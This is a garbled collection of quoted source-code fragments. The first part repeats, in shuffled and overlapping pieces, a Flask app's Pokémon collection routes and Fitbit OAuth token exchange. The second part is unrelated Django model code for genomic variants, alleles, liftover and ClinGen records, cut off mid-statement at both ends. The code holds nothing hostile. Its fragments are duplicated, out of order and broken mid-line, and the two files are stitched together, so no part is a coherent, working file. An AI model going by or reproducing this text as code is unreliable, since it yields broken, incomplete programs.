"auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'),",
"requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url +",
"= (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have",
"poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/')",
"from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon",
"this fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'],",
"see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have to do this base64",
"request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual access token token =",
"why we have to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8')",
"c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) #",
"token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, # client_secret=flask_app.config['FITBIT_CLIENT_SECRET']) session.update( FITBIT_REFRESH_TOKEN=token['refresh_token'])",
"<gh_stars>0 import base64 import logging import requests from flask import redirect, render_template, request,",
"team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return",
"(f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have to",
"return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens #",
"reason this fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth =",
"render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon)",
"oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token(",
"# token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, # client_secret=flask_app.config['FITBIT_CLIENT_SECRET']) session.update(",
"token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this fails with",
"'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token',",
"import logging import requests from flask import redirect, render_template, request, session from requests_oauthlib",
"flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection():",
"@flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def",
"'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type':",
"from flask import redirect, render_template, request, session from requests_oauthlib import OAuth2Session from poketrainer.app",
"'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual access token",
"def team(): pokemon = requests.get(request.host_url + 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login():",
"import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def",
"this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic",
"+ 'api/team').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback():",
"'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon = requests.get(request.host_url + 'api/team').json() return",
"request.host_url + FITBIT_CALLBACK_URI} # request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header,",
"f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we have to do",
"(base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'} post_params =",
"stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type':",
"collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team(): pokemon",
"# oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token =",
"= requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json() LOGGER.debug(token) # for some reason this fails with 'Missing",
"{'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual access",
"import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url",
"b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}', 'Content-Type': 'application/x-www-form-urlencoded'}",
"# noqa # for why we have to do this base64 stuff b64_creds",
"scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, # client_secret=flask_app.config['FITBIT_CLIENT_SECRET'])",
"import requests from flask import redirect, render_template, request, session from requests_oauthlib import OAuth2Session",
"# redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', #",
"def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon) @flask_app.route('/ui/team/') def team():",
"LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html',",
"return render_template('collection.html', pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret =",
"fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens",
"base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization': f'Basic {b64_creds}',",
"logging import requests from flask import redirect, render_template, request, session from requests_oauthlib import",
"with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url",
"# c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity'])",
"FITBIT_CALLBACK_URI LOGGER = logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return",
"pokemon=pokemon) @flask_app.route('/fitbit_login/') def fitbit_login(): return _generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}')",
"redirect_uri=request.host_url + '/fitbitCallback/', # scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url,",
"_generate_fitbit_token() @flask_app.route('/fitbitCallback') def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa",
"do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header = {'Authorization':",
"fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why",
"# scope=['activity']) # token = oauth.fetch_token( # token_url='https://api.fitbit.com/oauth2/token', # authorization_response=request.url, # include_client_id=True, #",
"we have to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip())",
"= logging.getLogger(__name__) @flask_app.route('/ui/collection/') def collection(): pokemon = requests.get(request.host_url + 'api/collection').json() return render_template('collection.html', pokemon=pokemon)",
"token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 # oauth = OAuth2Session(client_id=flask_app.config['FITBIT_CLIENT_ID'], # redirect_uri=request.host_url + '/fitbitCallback/', #",
"= {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual",
"request, session from requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import",
"id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for why we",
"'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} # request the actual access token token",
"LOGGER.debug(token) # for some reason this fails with 'Missing access token' # c.f.",
"for some reason this fails with 'Missing access token' # c.f. https://github.com/requests/requests-oauthlib/issues/324 #",
"+ FITBIT_CALLBACK_URI} # request the actual access token token = requests.post('https://api.fitbit.com/oauth2/token', headers=auth_header, params=post_params).json()",
"def fitbit_callback(): id_secret = (f'{flask_app.config[\"FITBIT_CLIENT_ID\"]}:' f'{flask_app.config[\"FITBIT_CLIENT_SECRET\"]}') # see https://dev.fitbit.com/build/reference/web-api/oauth2/#refreshing-tokens # noqa # for",
"to do this base64 stuff b64_creds = (base64.encodebytes(bytes(id_secret, 'utf8')) .decode('utf8') .rstrip()) auth_header =",
"'Content-Type': 'application/x-www-form-urlencoded'} post_params = {'grant_type': 'authorization_code', 'code': request.args.get('code'), 'redirect_uri': request.host_url + FITBIT_CALLBACK_URI} #",
"requests_oauthlib import OAuth2Session from poketrainer.app import flask_app from poketrainer.api.syncs.fitbit import _generate_fitbit_token, \\ FITBIT_CALLBACK_URI"
] |
[
"class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele,",
"can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all",
"Linked against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def",
"-> QuerySet: return self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if",
"if other_clingen_allele: # Move across ClinGen Allele (may not have been possible to",
"is set in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source",
"returns (chrom, position, ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string):",
"variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid",
"self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is",
"No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def",
"= \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together",
"subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first()",
"those cases # we'll have the same variant linked through different VariantAlleles (so",
"\"\"\" :param liftover_complete: If False does not check for missing representations \"\"\" if",
"def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele",
"can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele =",
"requires x bytes, maximum size is 8191\" The easiest solution is to md5sum",
"but that requires installing the btree_gist extension (requires postgres Admin rights). Django 3",
"return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt",
"variant linked through different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant,",
"Optional, if got a variant but invalid error_message = models.TextField() class Meta: unique_together",
"\"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self): return f\"{self.chrom}:{self.position} {self.ref}\" class",
"from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf import",
"allele (due to our normalization not being the same as ClinGen or 2",
"+ >= 1 alts pointing to the same locus for the row) There",
"ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel):",
"Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def",
"if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr) return chrom, position,",
"same change point to same allele This is generally done via ClinGen Allele",
"if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt) conversion_tool = AlleleConversionTool.DBSNP variant_tuple = None if",
"groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None if m :=",
"per line in a VCF file (multiple Variants with different alt alleles point",
"want_chr): ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT",
"on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name",
"conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs",
"GRCh37 and GRCh38 variants for same change point to same allele This is",
"choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref",
"merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge,",
"start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q =",
"retrieve in all builds, but at least one # links there, and can't",
"def __str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return",
"via insertion queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt =",
"models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\" Returns subclass instance \"\"\"",
"Returns subclass instance \"\"\" return AlleleSource.objects.get_subclass(pk=self.allele_source_id) def get_allele_qs(self) -> QuerySet: return self.get_allele_source().get_allele_qs() def",
"= {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start)",
"\"Allele\") -> bool: \"\"\" Merge other_allele into this allele \"\"\" if self ==",
"User from django.db import models, IntegrityError from django.db.models import Value as V, QuerySet,",
"conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\")",
"self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self):",
"for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel):",
"to have the same 3 variant/build/allele so we can add that unique_together constraint",
"DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat",
"if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def",
"def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for missing",
"allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge",
"def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self)",
"can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True,",
"-> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def",
"Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection,",
"Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return",
"\"\"\" Return a \"1:123321 G>C\" style string in a query \"\"\" kwargs =",
"alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt == '.'",
"Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and GRCh38 variants for",
"style string in a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\"",
"self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation",
"Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return",
"condition=vcr_condition)} def get_q(self): if self.status != ProcessingStatus.SUCCESS: raise ValueError(f\"{self}: status {self.get_status_display()} != SUCCESS\")",
"expect to store Alleles for a small fraction of Variants So don't want",
"extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension",
"on that. Another possible solution is to use Gist indexes but that requires",
"self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def",
"null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource:",
"{self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message =",
"return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError:",
"def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position,",
"get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return",
"F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs, q @staticmethod def annotate_variant_string(qs, name=\"variant_string\",",
"different alleles at a locus Usually 2+ per line in a VCF file",
"(requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to",
"errors all subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va",
"self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref =",
"a variant in allele {self.id} for build {genome_build}') if not va: va =",
"{self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str):",
"genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self):",
"chrom = format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant =",
"20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return",
"va: return va.variant raise ValueError(f'Could not find any variants in allele {self.id}') def",
"call) If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\"",
"variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy",
"def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt,",
"\"\"\" It's possible for multiple variants from the same genome build to resolve",
"bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) ->",
"Merge other_allele into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to",
"of: \"index row requires x bytes, maximum size is 8191\" The easiest solution",
"= models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if",
"return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if",
"VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele)",
"- instead do 1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share",
"self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position,",
":= other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\",",
"VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild,",
"f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec:",
"self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length:",
"genome_build: va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not",
"self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all :=",
"def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False)",
"genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during",
"with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will",
"grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def",
"models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1,",
"x bytes, maximum size is 8191\" The easiest solution is to md5sum seq",
"from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from lazy import lazy from",
"to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele =",
"VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write",
"VariantCoordinate: \"\"\" regex_pattern - has to have 4 groups, returns (chrom, position, ref,",
"at least one # links there, and can't have another, so it'll work)",
"def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None",
"version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None",
"Allele.pk and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen",
"# will show allele if there is one, otherwise go to variant page",
"return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there",
"genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return",
"class Variant(models.Model): \"\"\" Variants represent the different alleles at a locus Usually 2+",
"{allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to Allele.merge() \"\"\"",
"be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT",
"end of a liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele",
"def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return",
"md5sum seq and make the constraint on that. Another possible solution is to",
"set in UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source =",
"error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) ->",
"[\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True)",
"contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def",
"return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def __str__(self): return f\"{self.allele} -",
"locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\",",
"coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq,",
"if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def",
"\"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the",
"variant/build/allele so we can add that unique_together constraint We only expect to store",
"= AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs =",
"if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains",
"= InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return",
"conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele into",
"Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def",
